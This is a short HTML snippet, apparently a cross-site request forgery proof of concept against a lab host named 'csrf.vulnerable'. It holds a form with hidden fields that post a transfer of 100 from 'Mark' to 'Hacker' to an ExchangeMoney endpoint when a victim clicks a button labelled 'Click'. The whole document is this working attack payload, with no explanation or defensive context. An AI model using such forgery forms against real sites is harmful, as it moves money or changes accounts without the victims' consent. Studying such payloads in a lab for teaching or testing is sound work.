
<form action="http://csrf.vulnerable/Home/ExchangeMoney" method="post">
    <input name="fromWho" type="hidden" value="Mark" />
    <input name="toWho" type="hidden" value="Hacker" />
    <input name="money" type="hidden" value="100" />
    <input id="postBtn" type="submit" value="Click" />
</form>
